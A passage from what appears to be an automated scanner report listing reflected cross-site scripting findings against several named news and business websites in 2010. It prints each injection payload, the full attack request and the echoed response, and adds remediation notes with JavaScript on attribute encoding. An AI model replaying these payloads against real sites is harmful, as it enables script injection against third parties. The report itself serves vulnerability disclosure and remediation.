Cookie: __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=47048311.1018667347.1292504930.1292504930.1292504930.1; __utmc=47048311; __utmb=47048311;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 13:42:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://www.adotas.com/wp/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 16 Dec 2010 13:42:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <meta http-equiv="refresh
...[SNIP]...
<a href="/wp/wp-content/plugins/flash-album-gallery/admin/js88818\"><script>alert(1)</script>193e7aea90/?print_friendly=1">
...[SNIP]...

2.300. http://www.adotas.com/wp/wp-content/plugins/flash-album-gallery/admin/js/swfobject.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adotas.com
Path:   /wp/wp-content/plugins/flash-album-gallery/admin/js/swfobject.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb2c4"><script>alert(1)</script>d9f3b9af84f was submitted in the REST URL parameter 6. This input was echoed as bb2c4\"><script>alert(1)</script>d9f3b9af84f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /wp/wp-content/plugins/flash-album-gallery/admin/jsbb2c4"><script>alert(1)</script>d9f3b9af84f/swfobject.js HTTP/1.1
Host: www.adotas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=47048311.1018667347.1292504930.1292504930.1292504930.1; __utmc=47048311; __utmb=47048311;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 13:42:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://www.adotas.com/wp/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 16 Dec 2010 13:42:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <meta http-equiv="refresh
...[SNIP]...
<a href="/wp/wp-content/plugins/flash-album-gallery/admin/jsbb2c4\"><script>alert(1)</script>d9f3b9af84f/?print_friendly=1">
...[SNIP]...

2.301. http://www.adotas.com/wp/wp-content/plugins/polls/polls-css.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adotas.com
Path:   /wp/wp-content/plugins/polls/polls-css.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dddc"><script>alert(1)</script>149d3d7c9cc was submitted in the REST URL parameter 4. This input was echoed as 4dddc\"><script>alert(1)</script>149d3d7c9cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /wp/wp-content/plugins/polls4dddc"><script>alert(1)</script>149d3d7c9cc/polls-css.css HTTP/1.1
Host: www.adotas.com
Proxy-Connection: keep-alive
Referer: http://www.adotas.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 13:22:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://www.adotas.com/wp/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 16 Dec 2010 13:22:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 61527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <meta http-equiv="refresh
...[SNIP]...
<a href="/wp/wp-content/plugins/polls4dddc\"><script>alert(1)</script>149d3d7c9cc/?print_friendly=1">
...[SNIP]...

2.302. http://www.adotas.com/wp/wp-content/plugins/polls/polls-js.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adotas.com
Path:   /wp/wp-content/plugins/polls/polls-js.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee25a"><script>alert(1)</script>4e7de7a1730 was submitted in the REST URL parameter 4. This input was echoed as ee25a\"><script>alert(1)</script>4e7de7a1730 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /wp/wp-content/plugins/pollsee25a"><script>alert(1)</script>4e7de7a1730/polls-js.php HTTP/1.1
Host: www.adotas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=47048311.1018667347.1292504930.1292504930.1292504930.1; __utmc=47048311; __utmb=47048311;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 13:38:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://www.adotas.com/wp/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 16 Dec 2010 13:38:18 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <meta http-equiv="refresh
...[SNIP]...
<a href="/wp/wp-content/plugins/pollsee25a\"><script>alert(1)</script>4e7de7a1730/?print_friendly=1">
...[SNIP]...

2.303. http://www.adotas.com/wp/wp-content/wp-recommend/recommend.popup.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adotas.com
Path:   /wp/wp-content/wp-recommend/recommend.popup.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c086"><script>alert(1)</script>6ad38bb8e36 was submitted in the REST URL parameter 1. This input was echoed as 8c086\"><script>alert(1)</script>6ad38bb8e36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /wp8c086"><script>alert(1)</script>6ad38bb8e36/wp-content/wp-recommend/recommend.popup.php HTTP/1.1
Host: www.adotas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=47048311.1018667347.1292504930.1292504930.1292504930.1; __utmc=47048311; __utmb=47048311;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 13:38:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://www.adotas.com/wp/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 16 Dec 2010 13:38:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <meta http-equiv="refresh
...[SNIP]...
<a href="/wp8c086\"><script>alert(1)</script>6ad38bb8e36/wp-content/wp-recommend/?print_friendly=1">
...[SNIP]...

2.304. http://www.adotas.com/wp/wp-content/wp-recommend/recommend.popup.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adotas.com
Path:   /wp/wp-content/wp-recommend/recommend.popup.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b60c"><script>alert(1)</script>bc83d14ec6a was submitted in the REST URL parameter 2. This input was echoed as 2b60c\"><script>alert(1)</script>bc83d14ec6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /wp/wp-content2b60c"><script>alert(1)</script>bc83d14ec6a/wp-recommend/recommend.popup.php HTTP/1.1
Host: www.adotas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=47048311.1018667347.1292504930.1292504930.1292504930.1; __utmc=47048311; __utmb=47048311;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 13:38:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://www.adotas.com/wp/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 16 Dec 2010 13:38:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <meta http-equiv="refresh
...[SNIP]...
<a href="/wp/wp-content2b60c\"><script>alert(1)</script>bc83d14ec6a/wp-recommend/?print_friendly=1">
...[SNIP]...

2.305. http://www.adotas.com/wp/wp-content/wp-recommend/recommend.popup.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adotas.com
Path:   /wp/wp-content/wp-recommend/recommend.popup.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 624c8"><script>alert(1)</script>639c973e5f2 was submitted in the REST URL parameter 3. This input was echoed as 624c8\"><script>alert(1)</script>639c973e5f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /wp/wp-content/wp-recommend624c8"><script>alert(1)</script>639c973e5f2/recommend.popup.php HTTP/1.1
Host: www.adotas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=47048311.1018667347.1292504930.1292504930.1292504930.1; __utmc=47048311; __utmb=47048311;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 13:38:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://www.adotas.com/wp/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 16 Dec 2010 13:38:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <meta http-equiv="refresh
...[SNIP]...
<a href="/wp/wp-content/wp-recommend624c8\"><script>alert(1)</script>639c973e5f2/?print_friendly=1">
...[SNIP]...

2.306. http://www.adotas.com/wp/wp-content/wp-recommend/recommend.popup.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adotas.com
Path:   /wp/wp-content/wp-recommend/recommend.popup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd1d1"><script>alert(1)</script>0a945229459 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp/wp-content/wp-recommend/recommend.popup.php/cd1d1"><script>alert(1)</script>0a945229459 HTTP/1.1
Host: www.adotas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=47048311.1018667347.1292504930.1292504930.1292504930.1; __utmc=47048311; __utmb=47048311;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:38:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Cache-Control: max-age=7200
Expires: Thu, 16 Dec 2010 15:38:01 GMT
Content-Length: 2892
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <title>Adotas.com :: Email a friend</title>
   <link rel="stylesheet" href="recommend.css" type="text/css">
<script src=".
...[SNIP]...
<form method="post" action="/wp/wp-content/wp-recommend/recommend.popup.php/cd1d1"><script>alert(1)</script>0a945229459">
...[SNIP]...

2.307. http://www.adotas.com/wp/wp-includes/js/tw-sack.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adotas.com
Path:   /wp/wp-includes/js/tw-sack.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c66e"><script>alert(1)</script>dc200739add was submitted in the REST URL parameter 3. This input was echoed as 2c66e\"><script>alert(1)</script>dc200739add in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /wp/wp-includes/js2c66e"><script>alert(1)</script>dc200739add/tw-sack.js HTTP/1.1
Host: www.adotas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=47048311.1018667347.1292504930.1292504930.1292504930.1; __utmc=47048311; __utmb=47048311;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 13:38:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://www.adotas.com/wp/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 16 Dec 2010 13:38:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <meta http-equiv="refresh
...[SNIP]...
<a href="/wp/wp-includes/js2c66e\"><script>alert(1)</script>dc200739add/?print_friendly=1">
...[SNIP]...

2.308. http://www.adotas.com/wp/xmlrpc.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adotas.com
Path:   /wp/xmlrpc.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d75c"><script>alert(1)</script>c59fc861253 was submitted in the REST URL parameter 1. This input was echoed as 5d75c\"><script>alert(1)</script>c59fc861253 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /wp5d75c"><script>alert(1)</script>c59fc861253/xmlrpc.php HTTP/1.1
Host: www.adotas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=47048311.1018667347.1292504930.1292504930.1292504930.1; __utmc=47048311; __utmb=47048311;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 13:37:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://www.adotas.com/wp/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 16 Dec 2010 13:37:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <meta http-equiv="refresh
...[SNIP]...
<a href="/wp5d75c\"><script>alert(1)</script>c59fc861253/?print_friendly=1">
...[SNIP]...

2.309. http://www.btobonline.com/apps/pbcs.dll/article [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.btobonline.com
Path:   /apps/pbcs.dll/article

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36017"><a>0070e0651e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /apps/pbcs.dll/article?36017"><a>0070e0651e1=1 HTTP/1.1
Host: www.btobonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=266300892.1292504932.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); stitialcookie=1; PBCSSESSIONID=473412229342877; did=j; OAX=rnneEk0KD3EAB0jq; __utma=266300892.1674254243.1292504932.1292504932.1292504932.1; CP=null*; __utmc=266300892; __utmb=266300892.4.10.1292504932; chkcookie=1292505027318; PBCSPERMUSERID=473412229342877;

Response

HTTP/1.0 200 OK
Content-Length: 37310
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Thu, 16 Dec 2010 13:37:28 GMT
Server: Microsoft-IIS/7.0
X-Passed-To: S260608AT1VW221, URL Rewrite on site N/A (2010-12-16 08:37:28:132)
X-Handled-By: S260608AT1VW221, Rewrite on site N/A
X-Actual-URL: S260608AT1VW221, (/apps/pbcs.dll/article?36017"><a>0070e0651e1=1)
X-Passed-To-DLL: S260608AT1VW221, (2010-12-16 08:37:28:132)
X-Passed-To-BeforeDispatch: S260608AT1VW221, on site CT (2010-12-16 08:37:28:132)
X-Returned-From-BeforeDispatch: S260608AT1VW221, on site CT (2010-12-16 08:37:28:147)
X-Passed-To-PostProcessResponse: S260608AT1VW221, on site CT (2010-12-16 08:37:28:616)
X-Returned-From-PostProcessResponse: S260608AT1VW221, on site CT (2010-12-16 08:37:28:616)
X-Returned-From-DLL: S260608AT1VW221 (2010-12-16 08:37:28:616)
X-Returned-From: S260608AT1VW221(2010-12-16 08:37:28:616)
Date: Thu, 16 Dec 2010 13:37:27 GMT
X-Cache: MISS from crsquid02
X-Cache-Lookup: MISS from crsquid02:80
Via: 1.0 crsquid02 (squid/3.0.STABLE18)
Connection: close

<html>
<head>
<title>BtoB Magazine: Marketing News and Strategies for BtoB, Direct & Internet Marketing</title>
<link rel="shortcut icon" href="/favicon.ico">

<script type="text/javascript">


...[SNIP]...
<fb:like href="http://www.btobonline.com/apps/pbcs.dll/article?36017"><a>0070e0651e1=1" layout="button_count" show_faces="false" width="100">
...[SNIP]...
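
The attribute-context reflections in 2.308 and 2.309 (and the similar ones later in this section) differ only in whether the application touched the quotation mark at all. The following is an added example, not code from the report or from the sites it covers: it reproduces the addslashes()-style escaping visible in the 2.308 response, puts entity encoding beside it, and uses a small tag tokenizer to show which elements a browser would see. The <a href> template is an assumption modelled on the reflected snippet; the payload is the one the report submitted.

```javascript
// Added example, not code from the scanner report or from the sites listed.
// Shows why the backslash seen in the 2.308 response does not help, and what
// encoding does. The <a href> template is an assumption modelled on the
// reflected snippet; the payload is the one the report submitted.
const PAYLOAD = '5d75c"><script>alert(1)</script>c59fc861253';

// addslashes()-style escaping, which is what the 2.308 response looks like:
// the quote is prefixed with a backslash, nothing else is touched.
function escapeWithBackslash(s) {
  return s.replace(/\\/g, '\\\\').replace(/"/g, '\\"');
}

// Correct encoding for a double-quoted HTML attribute value: the five
// HTML-significant characters become entities. The backslash is irrelevant.
function escapeHtmlAttr(s) {
  return s.replace(/&/g, '&amp;')
          .replace(/"/g, '&quot;')
          .replace(/'/g, '&#39;')
          .replace(/</g, '&lt;')
          .replace(/>/g, '&gt;');
}

// Builds the print-friendly link the way the vulnerable page appears to,
// once with the ineffective escaping and once with entity encoding.
function renderLinkNaive(path) {
  return '<a href="/wp' + escapeWithBackslash(path) + '/?print_friendly=1">print</a>';
}
function renderLinkSafe(path) {
  return '<a href="/wp' + escapeHtmlAttr(path) + '/?print_friendly=1">print</a>';
}

// Minimal tag tokenizer reproducing the one browser rule that matters here:
// inside a start tag, a quoted attribute value runs to the matching quote and
// a backslash is just another character. Returns the tag names (lower-cased,
// end tags prefixed with '/') in document order.
function tagNames(html) {
  const names = [];
  let i = 0;
  while (i < html.length) {
    if (html[i] !== '<') { i++; continue; }
    let j = i + 1;
    let name = '';
    while (j < html.length && /[A-Za-z0-9:\/-]/.test(html[j])) { name += html[j++]; }
    if (!name) { i++; continue; }
    names.push(name.toLowerCase());
    let quote = null;                    // quote character currently open, if any
    while (j < html.length) {
      const c = html[j++];
      if (quote) { if (c === quote) quote = null; }
      else if (c === '"' || c === "'") quote = c;
      else if (c === '>') break;
    }
    i = j;
  }
  return names;
}

// With backslash escaping the browser still sees a <script> element;
// with entity encoding the whole payload stays inside the href value.
console.log(tagNames(renderLinkNaive(PAYLOAD)));  // [ 'a', 'script', '/script', '/a' ]
console.log(tagNames(renderLinkSafe(PAYLOAD)));   // [ 'a', '/a' ]
```

The tokenizer deliberately ignores entities, scripts and comments; it models only the quoting rule needed to see why the backslash is inert. The fix is the same for every attribute-context finding in this section: encode for the HTML attribute context at the point of output, regardless of whatever escaping was applied for a database or JavaScript earlier.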

2.310. http://www.computerworld.dk/art/112943 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.computerworld.dk
Path:   /art/112943

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db257</script><script>alert(1)</script>3f8a39181ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. The closing script tag works because the HTML tokenizer ends a script element at the first </script it encounters, irrespective of JavaScript quoting; the payload therefore terminates the original script block and the script tag that follows is parsed as a new element. Escaping quotation marks inside the JavaScript string alone would not have prevented this.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /art/112943db257</script><script>alert(1)</script>3f8a39181ee HTTP/1.1
Host: www.computerworld.dk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:39:20 GMT
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=s0ni9dbq4as6riq9arakb35u30; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=iso-8859-1
Server: Concealed by Juniper Networks DX R.no
Via: 1.1 dx1 (Juniper Networks Application Acceleration Platform - DX 5.3.2 0)

   
       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da">
   <head>

...[SNIP]...
<script type="text/javascript">
   COMSCORE.beacon({
       c1:2,
       c2:6035308,
       c3:"",
       c4:"www.computerworld.dk/art/112943db257</script><script>alert(1)</script>3f8a39181ee",
       c5:"",
       c6:"",
       c15:""
   });
   </script>
...[SNIP]...

2.311. http://www.computerworld.dk/art/112943 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.computerworld.dk
Path:   /art/112943

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66293"-alert(1)-"0b7c71fbe95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /art/112943?66293"-alert(1)-"0b7c71fbe95=1 HTTP/1.1
Host: www.computerworld.dk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:38:29 GMT
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=jccshcg3108i2gm761jtpv6lu5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=iso-8859-1
Server: Concealed by Juniper Networks DX R.no
Via: 1.1 dx1 (Juniper Networks Application Acceleration Platform - DX 5.3.2 0)

   
       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da">
   <head>

...[SNIP]...
<script type="text/javascript">
   COMSCORE.beacon({
       c1:2,
       c2:6035308,
       c3:"",
       c4:"www.computerworld.dk/art/112943?66293"-alert(1)-"0b7c71fbe95=1",
       c5:"",
       c6:"",
       c15:""
   });
   </script>
...[SNIP]...

2.312. http://www.idc.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idc.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c83c"><script>alert(1)</script>4bfa1b85fda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?7c83c"><script>alert(1)</script>4bfa1b85fda=1 HTTP/1.1
Host: www.idc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6E1B5E28D57716E9F44CCE1B6AB4D809; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Thu, 16 Dec 2010 13:22:46 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 49728


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>IDC Home: The premier global market intelligence firm.</title>

<!--The below meta tag was
...[SNIP]...
